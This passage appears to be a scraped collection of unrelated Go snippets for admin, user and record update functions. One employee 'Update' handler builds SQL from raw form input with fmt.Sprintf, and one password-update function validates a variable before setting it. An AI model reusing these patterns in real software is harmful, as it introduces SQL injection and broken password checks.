0x0183\", http.StatusInternalServerError)\n\t}\n}", "func (auo *AdminUpdateOne) Save(ctx context.Context) (*Admin, error) {\n\tvar (\n\t\terr error\n\t\tnode *Admin\n\t)\n\tif len(auo.hooks) == 0 {\n\t\tnode, err = auo.sqlSave(ctx)\n\t} else {\n\t\tvar mut Mutator = MutateFunc(func(ctx context.Context, m Mutation) (Value, error) {\n\t\t\tmutation, ok := m.(*AdminMutation)\n\t\t\tif !ok {\n\t\t\t\treturn nil, fmt.Errorf(\"unexpected mutation type %T\", m)\n\t\t\t}\n\t\t\tauo.mutation = mutation\n\t\t\tnode, err = auo.sqlSave(ctx)\n\t\t\tmutation.done = true\n\t\t\treturn node, err\n\t\t})\n\t\tfor i := len(auo.hooks) - 1; i >= 0; i-- {\n\t\t\tmut = auo.hooks[i](mut)\n\t\t}\n\t\tif _, err := mut.Mutate(ctx, auo.mutation); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn node, err\n}", "func UpdateUser(userId int64, userData *UserEntry) error {\n _ , nerr := model.Database.Exec(\"UPDATE users SET username = ?, isadmin = ?, email = ? WHERE userid = ?\", userData.Username, userData.IsAdmin, userData.Email, userId)\n if nerr != nil {\n return nerr\n }\n return nil\n}", "func (auo *AdminUpdateOne) Exec(ctx context.Context) error {\n\t_, err := auo.Save(ctx)\n\treturn err\n}", "func (s *Service) AdminEdit(c context.Context, areas []string, rule, comment, reason, name string, mode int8, level *model.AreaLevel, tps []int64, id, adid, stime, etime int64, source, keyType int8) (err error) {\n\tif err = s.checkArea(c, areas); err != nil {\n\t\treturn\n\t}\n\tif err = s.checkReg(mode, rule); err != nil {\n\t\treturn\n\t}\n\tif err = s.checkWhiteSample(mode, rule); err != nil {\n\t\treturn\n\t}\n\tvar afterRule *model.FilterInfo\n\tif afterRule, err = s.dao.FilterByContent(c, rule); err != nil {\n\t\treturn\n\t}\n\tif afterRule != nil && afterRule.State == model.FilterStateNormal && afterRule.ID != id {\n\t\treturn ecode.FilterDuplicateContent\n\t}\n\n\tvar tx *xsql.Tx\n\tif tx, err = s.dao.BeginTran(c); err != nil {\n\t\treturn\n\t}\n\t// 先删除原敏感词\n\tif _, err = s.dao.TxUpdateRuleState(c, tx, id, model.FilterStateDeleted); err != nil {\n\t\ttx.Rollback()\n\t\treturn\n\t}\n\tif _, err = s.dao.DeleteAreaRules(c, tx, id); err != nil {\n\t\ttx.Rollback()\n\t\treturn\n\t}\n\tvar newID int64\n\t// insert 新敏感词 或 update 已有敏感词\n\tif newID, err = s.dao.UpsertRule(c, tx, rule, comment, level.Level, mode, source, keyType, time.Unix(stime, 0), time.Unix(etime, 0)); err != nil {\n\t\ttx.Rollback()\n\t\treturn\n\t}\n\tif afterRule != nil {\n\t\tnewID = afterRule.ID\n\t}\n\t// 如果新的敏感词和之前不一致,插入一条日志\n\tif newID != id {\n\t\tif _, err = s.dao.InsertLog(c, tx, id, adid, reason, name, model.LogStateEdit); err != nil {\n\t\t\ttx.Rollback()\n\t\t\treturn\n\t\t}\n\t}\n\t// 插入area\n\tfor _, area := range areas {\n\t\tvar (\n\t\t\tareaLevel int8\n\t\t\tok bool\n\t\t)\n\t\tif areaLevel, ok = level.Area[area]; !ok {\n\t\t\tareaLevel = level.Level\n\t\t}\n\t\tfor _, tp := range tps {\n\t\t\tif _, err = s.dao.UpsertAreaRule(c, tx, area, tp, newID, areaLevel); err != nil {\n\t\t\t\ttx.Rollback()\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\tif _, err = s.dao.InsertLog(c, tx, newID, adid, reason, name, model.LogStateEdit); err != nil {\n\t\ttx.Rollback()\n\t\treturn\n\t}\n\terr = tx.Commit()\n\ts.mission(func() {\n\t\ts.notifySearch(context.TODO(), areas)\n\t})\n\treturn\n}", "func (svc *AdminStepService) Update(s *library.Step) (*library.Step, *Response, error) {\n\t// set the API endpoint path we send the request to\n\tu := \"/api/v1/admin/step\"\n\n\t// library Step type we want to return\n\tv := new(library.Step)\n\n\t// send request using client\n\tresp, err := svc.client.Call(\"PUT\", u, s, v)\n\n\treturn v, resp, err\n}", "func SaveAdmin(admin *model.Admin) error {\n\n\tpassword, err := crypto.AESEncrypt(admin.Password)\n\tif err != nil {\n\t\treturn err\n\t}\n\tadmin.Password = password\n\tif admin.Password == \"\" {\n\t\treturn fmt.Errorf(\"Encrypt failure\")\n\t}\n\treturn db.From(\"admin\").Save(admin)\n\n}", "func (a *Client) SetAdmin(params *SetAdminParams, authInfo runtime.ClientAuthInfoWriter) (*SetAdminOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewSetAdminParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"setAdmin\",\n\t\tMethod: \"PUT\",\n\t\tPathPattern: \"/api/v1/admin\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &SetAdminReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*SetAdminOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*SetAdminDefault)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (aaa *ThirdPartyService) AdminUpdateThirdPartyConfig(input *third_party.AdminUpdateThirdPartyConfigParams) (*lobbyclientmodels.ModelsUpdateConfigResponse, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, internalServerError, err := aaa.Client.ThirdParty.AdminUpdateThirdPartyConfig(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func (auo *AdministratorUpdateOne) Exec(ctx context.Context) error {\n\t_, err := auo.Save(ctx)\n\treturn err\n}", "func Update(w http.ResponseWriter, r *http.Request) {\r\n\tdb := Database.Dbconn()\r\n\tif r.Method == \"POST\" {\r\n\r\n\t\tId := r.FormValue(\"Id\")\r\n\t\tName := r.FormValue(\"Name\")\r\n\t\tLocation := r.FormValue(\"Location\")\r\n\r\n\t\ttsql := fmt.Sprintf(\"UPDATE employee.dbo.employee SET Name='%s', Location='%s' WHERE Id='%s';\", Name, Location, Id)\r\n\t\t_, err := db.Exec(tsql)\r\n\t\tif err != nil {\r\n\t\t\tpanic(err.Error())\r\n\t\t}\r\n\t\tlog.Println(\"UPDATE: Id: \" + Id + \" | Name: \" + Name + \" | Location: \"+Location)\r\n\t}\r\n\tdefer db.Close()\r\n\thttp.Redirect(w, r, \"/index\", 301)\r\n}", "func AdminList(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminList, w, data)\n}", "func (s *Store) Update(c *gin.Context) {\n\n}", "func (c *AdminClient) Update() *AdminUpdate {\n\tmutation := newAdminMutation(c.config, OpUpdate)\n\treturn &AdminUpdate{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func (a Author) Update(cfg *config.Config, authorID string, data map[string]string) {\n\n}", "func AdminList(w http.ResponseWriter, data *AdminListData) {\n\trender(tpAdminList, w, data)\n}", "func (svc *AdminUserService) Update(u *library.User) (*library.User, *Response, error) {\n\t// set the API endpoint path we send the request to\n\turl := \"/api/v1/admin/user\"\n\n\t// library User type we want to return\n\tv := new(library.User)\n\n\t// send request using client\n\tresp, err := svc.client.Call(\"PUT\", url, u, v)\n\n\treturn v, resp, err\n}", "func (d *Dao) AdminBind(c context.Context, mid, aid int64, tags, regionName, ip string) (err error) {\n\tparams := url.Values{}\n\tparams.Set(\"mid\", strconv.FormatInt(mid, 10))\n\tparams.Set(\"aid\", strconv.FormatInt(aid, 10))\n\tparams.Set(\"tnames\", tags)\n\tparams.Set(\"region_name\", regionName)\n\tvar res struct {\n\t\tCode int `json:\"code\"`\n\t}\n\n\tif err = d.client.Post(c, d.adminBindURL, ip, params, &res); err != nil {\n\t\tlog.Error(\"AdminBind d.client.Post(%s) error(%v)\", d.adminBindURL+\"?\"+params.Encode(), err)\n\t\treturn\n\t}\n\tlog.Info(\"AdminBind url(%s) code(%d)\", d.adminBindURL+\"?\"+params.Encode(), res.Code)\n\tif res.Code != 0 {\n\t\tlog.Error(\"AdminBind url(%s) code(%d)\", d.adminBindURL+\"?\"+params.Encode(), res.Code)\n\t\terr = fmt.Errorf(\"AdminBind response code(%d)!=0\", res.Code)\n\t}\n\treturn\n}", "func (au *AdminUpdate) Save(ctx context.Context) (int, error) {\n\tvar (\n\t\terr error\n\t\taffected int\n\t)\n\tif len(au.hooks) == 0 {\n\t\taffected, err = au.sqlSave(ctx)\n\t} else {\n\t\tvar mut Mutator = MutateFunc(func(ctx context.Context, m Mutation) (Value, error) {\n\t\t\tmutation, ok := m.(*AdminMutation)\n\t\t\tif !ok {\n\t\t\t\treturn nil, fmt.Errorf(\"unexpected mutation type %T\", m)\n\t\t\t}\n\t\t\tau.mutation = mutation\n\t\t\taffected, err = au.sqlSave(ctx)\n\t\t\tmutation.done = true\n\t\t\treturn affected, err\n\t\t})\n\t\tfor i := len(au.hooks) - 1; i >= 0; i-- {\n\t\t\tmut = au.hooks[i](mut)\n\t\t}\n\t\tif _, err := mut.Mutate(ctx, au.mutation); err != nil {\n\t\t\treturn 0, err\n\t\t}\n\t}\n\treturn affected, err\n}", "func (ct *CompanyTestSuite) TestUpdateByNonAdmin(c *C) {\n\ttoken := getTestDefaultAuthToken()\n\n\t// create new another company\n\tcompanyName := fmt.Sprintf(\"companyName_%v\", time.Now().UnixNano())\n\n\tcompany, err := createTestCompany(companyName, token)\n\tc.Assert(err, IsNil)\n\n\temail := fmt.Sprintf(\"test_%[email protected]\", time.Now().UnixNano())\n\t_, err = createTestUser(email, token, \"\", false)\n\tcreatedUserToken := getTestLoginToken(fmt.Sprintf(`{\"email\":\"%s\", \"password\": \"12345\"}`, email))\n\n\t// try to update company\n\tcompanyTxt, _ := json.Marshal(company)\n\n\treq, err := http.NewRequest(\"POST\", fmt.Sprintf(\"http://127.0.0.1:8080/v1/company/%v\", company.Id), bytes.NewReader(companyTxt))\n\tc.Assert(err, IsNil)\n\n\treq.Header.Add(\"Authorization\", createdUserToken)\n\n\tclient := server.GetHTTPClient()\n\tresp, err := client.Do(req)\n\tdefer resp.Body.Close()\n\tc.Assert(err, IsNil)\n\n\tidResp := server.NewIDResponse()\n\terr = jsonpb.Unmarshal(resp.Body, idResp)\n\tc.Assert(err, IsNil)\n\tc.Assert(idResp.Meta.StatusCode, Equals, HttpStatusForbidden)\n}", "func (dag *DdgAdminGroup) Update(ctx context.Context, key ...interface{}) error {\n\tvar err error\n\tvar dbConn *sql.DB\n\n\t// if deleted, bail\n\tif dag._deleted {\n\t\treturn errors.New(\"update failed: marked for deletion\")\n\t}\n\n\ttx, err := components.M.GetConnFromCtx(ctx)\n\tif err != nil {\n\t\tdbConn, err = components.M.GetMasterConn()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\ttableName, err := GetDdgAdminGroupTableName(key...)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// sql query\n\tsqlstr := `UPDATE ` + tableName + ` SET ` +\n\t\t`name = ?, permission_ids = ?, status = ?` +\n\t\t` WHERE id = ?`\n\n\t// run query\n\tutils.GetTraceLog(ctx).Debug(\"DB\", zap.String(\"SQL\", fmt.Sprint(sqlstr, dag.Name, dag.PermissionIds, dag.Status, dag.ID)))\n\tif tx != nil {\n\t\t_, err = tx.Exec(sqlstr, dag.Name, dag.PermissionIds, dag.Status, dag.ID)\n\t} else {\n\t\t_, err = dbConn.Exec(sqlstr, dag.Name, dag.PermissionIds, dag.Status, dag.ID)\n\t}\n\treturn err\n}", "func UpdateAdminPermissionById(m *AdminPermission) (err error) {\n\to := orm.NewOrm()\n\tv := AdminPermission{Id: m.Id}\n\t// ascertain id exists in the database\n\tif err = o.Read(&v); err == nil {\n\t\tvar num int64\n\t\tif num, err = o.Update(m); err == nil {\n\t\t\tfmt.Println(\"Number of records updated in database:\", num)\n\t\t}\n\t}\n\treturn\n}", "func (u *User) Update() error {\n\tconn, err := db.Connect()\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\n\tsql := `UPDATE users SET \n\t\tusername = $1,\n\t\tname = $2,\n\t\tis_admin = $3\n\tWHERE id = $4`\n\tconn.QueryRow(sql, u.Username, u.Name, u.IsAdmin, u.ID)\n\n\treturn nil\n}", "func AdminCopyData(src, dst string) error {\n\tdb, err := getDB()\n\tif err != nil {\n\t\treturn err\n\t}\n\tsrcNode := db.NewRef(src)\n\tdstNode := db.NewRef(dst)\n\tvar srcData interface{}\n\tvar srcID interface{}\n\tif err := srcNode.Child(\"items\").Get(context.Background(), &srcData); err != nil {\n\t\treturn err\n\t}\n\tif err := srcNode.Child(\"global_id\").Get(context.Background(), &srcID); err != nil {\n\t\treturn err\n\t}\n\tif err := dstNode.Child(\"items\").Set(context.Background(), srcData); err != nil {\n\t\treturn err\n\t}\n\tif err := dstNode.Child(\"global_id\").Set(context.Background(), srcID); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (o *CMFAdminMenu) Update(ctx context.Context, exec boil.ContextExecutor, columns boil.Columns) (int64, error) {\n\tvar err error\n\tif err = o.doBeforeUpdateHooks(ctx, exec); err != nil {\n\t\treturn 0, err\n\t}\n\tkey := makeCacheKey(columns, nil)\n\tcmfAdminMenuUpdateCacheMut.RLock()\n\tcache, cached := cmfAdminMenuUpdateCache[key]\n\tcmfAdminMenuUpdateCacheMut.RUnlock()\n\n\tif !cached {\n\t\twl := columns.UpdateColumnSet(\n\t\t\tcmfAdminMenuAllColumns,\n\t\t\tcmfAdminMenuPrimaryKeyColumns,\n\t\t)\n\n\t\tif !columns.IsWhitelist() {\n\t\t\twl = strmangle.SetComplement(wl, []string{\"created_at\"})\n\t\t}\n\t\tif len(wl) == 0 {\n\t\t\treturn 0, errors.New(\"models: unable to update cmf_admin_menu, could not build whitelist\")\n\t\t}\n\n\t\tcache.query = fmt.Sprintf(\"UPDATE `cmf_admin_menu` SET %s WHERE %s\",\n\t\t\tstrmangle.SetParamNames(\"`\", \"`\", 0, wl),\n\t\t\tstrmangle.WhereClause(\"`\", \"`\", 0, cmfAdminMenuPrimaryKeyColumns),\n\t\t)\n\t\tcache.valueMapping, err = queries.BindMapping(cmfAdminMenuType, cmfAdminMenuMapping, append(wl, cmfAdminMenuPrimaryKeyColumns...))\n\t\tif err != nil {\n\t\t\treturn 0, err\n\t\t}\n\t}\n\n\tvalues := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(o)), cache.valueMapping)\n\n\tif boil.IsDebug(ctx) {\n\t\twriter := boil.DebugWriterFrom(ctx)\n\t\tfmt.Fprintln(writer, cache.query)\n\t\tfmt.Fprintln(writer, values)\n\t}\n\tvar result sql.Result\n\tresult, err = exec.ExecContext(ctx, cache.query, values...)\n\tif err != nil {\n\t\treturn 0, errors.Wrap(err, \"models: unable to update cmf_admin_menu row\")\n\t}\n\n\trowsAff, err := result.RowsAffected()\n\tif err != nil {\n\t\treturn 0, errors.Wrap(err, \"models: failed to get rows affected by update for cmf_admin_menu\")\n\t}\n\n\tif !cached {\n\t\tcmfAdminMenuUpdateCacheMut.Lock()\n\t\tcmfAdminMenuUpdateCache[key] = cache\n\t\tcmfAdminMenuUpdateCacheMut.Unlock()\n\t}\n\n\treturn rowsAff, o.doAfterUpdateHooks(ctx, exec)\n}", "func (bs *DefaultSecurity) UpdateAdminRoles(login string, delete bool) error {\n\tfor i, name := range bs.Admins.Roles {\n\t\tif name == login {\n\t\t\tif delete {\n\t\t\t\tbs.Admins.Roles = append(bs.Admins.Roles[:i], bs.Admins.Roles[i+1:]...)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn errors.New(\"Role already exists\")\n\t\t}\n\t}\n\tbs.Admins.Roles = append(bs.Admins.Roles, login)\n\treturn nil\n}", "func (s *permisoService) Update(id string, p *model.Permiso) error {\n\n\t// p.UpdatedAt = time.Now()\n\n\t// return s.service.Update(id, p)\n\n\treturn nil\n}", "func AdminUpdateDynamicConfig(c *cli.Context) {\n\tadminClient := cFactory.ServerAdminClient(c)\n\n\tdcName := getRequiredOption(c, FlagDynamicConfigName)\n\tdcValues := c.StringSlice(FlagDynamicConfigValue)\n\n\tctx, cancel := newContext(c)\n\tdefer cancel()\n\n\tvar parsedValues []*types.DynamicConfigValue\n\n\tif dcValues != nil {\n\t\tparsedValues = make([]*types.DynamicConfigValue, 0, len(dcValues))\n\n\t\tfor _, valueString := range dcValues {\n\t\t\tvar parsedInputValue *cliValue\n\t\t\terr := json.Unmarshal([]byte(valueString), &parsedInputValue)\n\t\t\tif err != nil {\n\t\t\t\tErrorAndExit(\"Unable to unmarshal value to inputValue\", err)\n\t\t\t}\n\t\t\tparsedValue, err := convertFromInputValue(parsedInputValue)\n\t\t\tif err != nil {\n\t\t\t\tErrorAndExit(\"Unable to convert from inputValue to DynamicConfigValue\", err)\n\t\t\t}\n\t\t\tparsedValues = append(parsedValues, parsedValue)\n\t\t}\n\t} else {\n\t\tparsedValues = nil\n\t}\n\n\treq := &types.UpdateDynamicConfigRequest{\n\t\tConfigName: dcName,\n\t\tConfigValues: parsedValues,\n\t}\n\n\terr := adminClient.UpdateDynamicConfig(ctx, req)\n\tif err != nil {\n\t\tErrorAndExit(\"Failed to update dynamic config value\", err)\n\t}\n\tfmt.Printf(\"Dynamic Config %s updated\\n\", dcName)\n}", "func (au *AdministratorUpdate) Save(ctx context.Context) (int, error) {\n\tvar (\n\t\terr error\n\t\taffected int\n\t)\n\tif len(au.hooks) == 0 {\n\t\tif err = au.check(); err != nil {\n\t\t\treturn 0, err\n\t\t}\n\t\taffected, err = au.sqlSave(ctx)\n\t} else {\n\t\tvar mut Mutator = MutateFunc(func(ctx context.Context, m Mutation) (Value, error) {\n\t\t\tmutation, ok := m.(*AdministratorMutation)\n\t\t\tif !ok {\n\t\t\t\treturn nil, fmt.Errorf(\"unexpected mutation type %T\", m)\n\t\t\t}\n\t\t\tif err = au.check(); err != nil {\n\t\t\t\treturn 0, err\n\t\t\t}\n\t\t\tau.mutation = mutation\n\t\t\taffected, err = au.sqlSave(ctx)\n\t\t\tmutation.done = true\n\t\t\treturn affected, err\n\t\t})\n\t\tfor i := len(au.hooks) - 1; i >= 0; i-- {\n\t\t\tmut = au.hooks[i](mut)\n\t\t}\n\t\tif _, err := mut.Mutate(ctx, au.mutation); err != nil {\n\t\t\treturn 0, err\n\t\t}\n\t}\n\treturn affected, err\n}", "func HandleUpdateShow(w http.ResponseWriter, r *http.Request) error {\n\n\t// Fetch the params\n\tparams, err := mux.Params(r)\n\tif err != nil {\n\t\treturn server.InternalError(err)\n\t}\n\n\t// Find the post\n\tpost, err := posts.Find(params.GetInt(posts.KeyName))\n\tif err != nil {\n\t\treturn server.NotFoundError(err)\n\t}\n\n\t// Authorise update post\n\tuser := session.CurrentUser(w, r)\n\terr = can.Update(post, user)\n\tif err != nil {\n\t\treturn server.NotAuthorizedError(err)\n\t}\n\n\t// Fetch the users\n\tauthors, err := users.FindAll(users.Where(\"role=?\", users.Admin))\n\tif err != nil {\n\t\treturn server.InternalError(err)\n\t}\n\n\t// Render the template\n\tview := view.NewRenderer(w, r)\n\tview.AddKey(\"currentUser\", user)\n\tview.AddKey(\"post\", post)\n\tview.AddKey(\"authors\", authors)\n\treturn view.Render()\n}", "func changeAdminProject(p *ConnectionPoolWrapper, id uint32, state bool) error {\n\tdb := p.GetConnection()\n\t_, err := db.Exec(\"update projects set admin = $1 where id = $2\", state, id)\n\tp.ReleaseConnection(db)\n\treturn err\n}", "func (svc *AdminSvcService) Update(s *library.Service) (*library.Service, *Response, error) {\n\t// set the API endpoint path we send the request to\n\tu := \"/api/v1/admin/service\"\n\n\t// library Service type we want to return\n\tv := new(library.Service)\n\n\t// send request using client\n\tresp, err := svc.client.Call(\"PUT\", u, s, v)\n\n\treturn v, resp, err\n}", "func (wu *WsubUpdate) Update(db XODB) error {\n\tvar err error\n\n\t// if doesn't exist, bail\n\tif !wu._exists {\n\t\treturn errors.New(\"update failed: does not exist\")\n\t}\n\n\t// if deleted, bail\n\tif wu._deleted {\n\t\treturn errors.New(\"update failed: marked for deletion\")\n\t}\n\n\t// sql query\n\tconst sqlstr = `UPDATE jlabo.wsub_updates SET ` +\n\t\t`update_site_id = ?, extension_id = ?, name = ?, description = ?, element = ?, type = ?, folder = ?, client_id = ?, version = ?, data = ?, detailsurl = ?, infourl = ?, extra_query = ?` +\n\t\t` WHERE update_id = ?`\n\n\t// run query\n\tXOLog(sqlstr, wu.UpdateSiteID, wu.ExtensionID, wu.Name, wu.Description, wu.Element, wu.Type, wu.Folder, wu.ClientID, wu.Version, wu.Data, wu.Detailsurl, wu.Infourl, wu.ExtraQuery, wu.UpdateID)\n\t_, err = db.Exec(sqlstr, wu.UpdateSiteID, wu.ExtensionID, wu.Name, wu.Description, wu.Element, wu.Type, wu.Folder, wu.ClientID, wu.Version, wu.Data, wu.Detailsurl, wu.Infourl, wu.ExtraQuery, wu.UpdateID)\n\treturn err\n}", "func AdminUserPwdUpdate(context *gin.Context,\n\tcacheDB int,\n\tsqlHandle,\n\tadminUserID,\n\tadminUserPwd,\n\tadminUserAginPwd string) *protocol.Response {\n\n\tvar pwd, oldPwd string\n\tvar err error\n\tvar oldUser *models.AdminUser\n\tvar errResult protocol.Response\n\n\tif !util.VerifyPasswordFormat(pwd) {\n\t\tlog.Debug(\"Modify admin user password format error:%s\", pwd)\n\t\terrResult = code.SpawnErrPwdFormat()\n\t\tgoto fail\n\t}\n\n\tif pwd != adminUserAginPwd {\n\t\tlog.Debug(\"Modify admin user password first!=second\")\n\t\terrResult = code.SpawnErrPwdAgin()\n\t\tgoto fail\n\t}\n\n\toldUser, err = database.AdminUserQueryPwd(sqlHandle, adminUserID)\n\tif err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tpwd, err = aes.Encrypt(oldUser.Secret, adminUserPwd)\n\n\tif err = database.AdminUserPwdUpdate(sqlHandle, adminUserID, pwd); err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tif oldPwd, err = database.GetRdsOnlineAdminPassword(cacheDB, adminUserID); err == nil {\n\t\tif oldPwd != pwd {\n\t\t\tif err = database.WithRdsOnlineAdminPwd(cacheDB, adminUserID, pwd); err != nil {\n\t\t\t\tlog.Debug(\"Modify admin user online password error:%s\", err.Error())\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\nfail:\n\treturn &errResult\n}", "func (m *TeamworkSoftwareUpdateHealth) SetAdminAgentSoftwareUpdateStatus(value TeamworkSoftwareUpdateStatusable)() {\n err := m.GetBackingStore().Set(\"adminAgentSoftwareUpdateStatus\", value)\n if err != nil {\n panic(err)\n }\n}", "func UpdateListMember(w http.ResponseWriter, r *http.Request) {\r\n\r\n}", "func (auo *AdministratorUpdateOne) Save(ctx context.Context) (*Administrator, error) {\n\tvar (\n\t\terr error\n\t\tnode *Administrator\n\t)\n\tif len(auo.hooks) == 0 {\n\t\tif err = auo.check(); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tnode, err = auo.sqlSave(ctx)\n\t} else {\n\t\tvar mut Mutator = MutateFunc(func(ctx context.Context, m Mutation) (Value, error) {\n\t\t\tmutation, ok := m.(*AdministratorMutation)\n\t\t\tif !ok {\n\t\t\t\treturn nil, fmt.Errorf(\"unexpected mutation type %T\", m)\n\t\t\t}\n\t\t\tif err = auo.check(); err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tauo.mutation = mutation\n\t\t\tnode, err = auo.sqlSave(ctx)\n\t\t\tmutation.done = true\n\t\t\treturn node, err\n\t\t})\n\t\tfor i := len(auo.hooks) - 1; i >= 0; i-- {\n\t\t\tmut = auo.hooks[i](mut)\n\t\t}\n\t\tif _, err := mut.Mutate(ctx, auo.mutation); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn node, err\n}", "func NewAdminUpdateUserResponseBodyAdmin(res *adminviews.JeeekUserView) *AdminUpdateUserResponseBodyAdmin {\n\tbody := &AdminUpdateUserResponseBodyAdmin{\n\t\tUserID: *res.UserID,\n\t\tUserName: *res.UserName,\n\t\tEmailAddress: *res.EmailAddress,\n\t\tPhoneNumber: *res.PhoneNumber,\n\t\tPhotoURL: *res.PhotoURL,\n\t\tEmailVerified: *res.EmailVerified,\n\t\tDisabled: res.Disabled,\n\t\tCreatedAt: res.CreatedAt,\n\t\tLastSignedinAt: res.LastSignedinAt,\n\t}\n\treturn body\n}", "func (r *resourceFrameworkShare) Update(ctx context.Context, req resource.UpdateRequest, resp *resource.UpdateResponse) {\n}", "func ChangeAdminPassword(client *gophercloud.ServiceClient, id, newPassword string) (r ActionResult) {\n\tb := map[string]interface{}{\n\t\t\"changePassword\": map[string]string{\n\t\t\t\"adminPass\": newPassword,\n\t\t},\n\t}\n\tresp, err := client.Post(actionURL(client, id), b, nil, nil)\n\t_, r.Header, r.Err = gophercloud.ParseResponse(resp, err)\n\treturn\n}", "func (du *DatsetUserMapping) Update(a *config.AppContext) error {\n\treturn a.Db.Model(du).Updates(map[string]interface{}{\"access_type\": du.AccessType}).Error\n}", "func (c *Context) RunAdmin(fn testFunc) {\n\tif c.Admin != nil {\n\t\tc.Run(\"Admin\", fn)\n\t}\n}", "func (m *sdt) SetAdmin(val string) {\n\tm.adminField = val\n}", "func Update(w http.ResponseWriter, r *http.Request) {\n\tdb := dbConn()\n\tif r.Method == \"POST\" {\n\t\tname := r.FormValue(\"name\")\n\t\tcity := r.FormValue(\"city\")\n\t\tid := r.FormValue(\"uid\")\n\t\tinsForm, err := db.Prepare(\"UPDATE Employee SET name=?, city=? WHERE id=?\")\n\t\tif err != nil {\n\t\t\tpanic(err.Error())\n\t\t}\n\t\tinsForm.Exec(name, city, id)\n\t\tlog.Println(\"UPDATE: Name: \" + name + \" | City: \" + city)\n\t}\n\tdefer db.Close()\n\thttp.Redirect(w, r, \"/\", 301)\n}", "func (d *Dosen) Update(db *sql.DB, namaDosen string) error {\n\tif d.ID == \"\" {\n\t\treturn fmt.Errorf(\"id tidak bolehh kosong\")\n\t}\n\tquery := \"UPDATE dosen Set namaDosen = $1 WHERE id = $2\"\n\t_, err := db.Exec(query, namaDosen, &d.ID)\n\treturn err\n}", "func NotifyAdmin(msg string) error {\n\treturn API.NotifyAdmin(msg)\n}", "func Update (w http.ResponseWriter, r *http.Request){\n\tif r.Method == \"POST\"{ // retorna tudo em string\n\t\tid := r.FormValue(\"id\")\n\t\tnome := r.FormValue(\"nome\")\n\t\tdescricao := r.FormValue(\"descricao\")\n\t\tpreco := r.FormValue(\"preco\")\n\t\tquantidade := r.FormValue(\"quantidade\")\n\n\t\t//convertendo os valores\n\n\t\tidConvertidoParaInt, err := strconv.Atoi(id)\n\t\tif err != nil {\n\t\t\tlog.Println(\"erro na conversão do ID para int:\", err)\n\t\t}\n\n\t\tprecoConvertidoParaFloat , err := strconv.ParseFloat(preco,64)\n\t\tif err != nil {\n\t\t\tlog.Println(\"erro na conversão do preço para float64:\", err)\n\t\t}\n\n\t\tquantidadeConvertidaParaInt, err := strconv.Atoi(quantidade)\n\t\tif err != nil {\n\t\t\tlog.Println(\"erro na conversão da quantidade para int:\", err)\n\t\t}\n\n\t\t//Mostrando quais os valores pra atualizar\n\t\tmodels.AtualizaProduto(idConvertidoParaInt, nome, descricao, precoConvertidoParaFloat, quantidadeConvertidaParaInt)\n\t}\n\thttp.Redirect(w, r, \"/\", 301)\n\n}", "func (aaa *NotificationService) UpdateTemplateLocalizationV1Admin(input *notification.UpdateTemplateLocalizationV1AdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Notification.UpdateTemplateLocalizationV1Admin(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func AdminLogin(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminLogin, w, data)\n}", "func (u *App) Update(c echo.Context, r *Update) (result *model.Post, err error) {\n\tif err = u.rbac.EnforceRole(c, model.AdminRole); err != nil {\n\t\tzaplog.ZLog(err)\n\t\treturn\n\t}\n\n\tif len(r.Excerpt) > 255 {\n\t\tr.Excerpt = r.Excerpt[:250] + \"...\"\n\t}\n\n\told, err := u.udb.View(u.db, r.ID)\n\tif err = zaplog.ZLog(err); err != nil {\n\t\treturn\n\t}\n\n\tif r.Status != \"\" && old.Status != r.Status && !old.AllowedStatuses(r.Status) {\n\t\terr = zaplog.ZLog(fmt.Errorf(\"Não é possível passar de %s 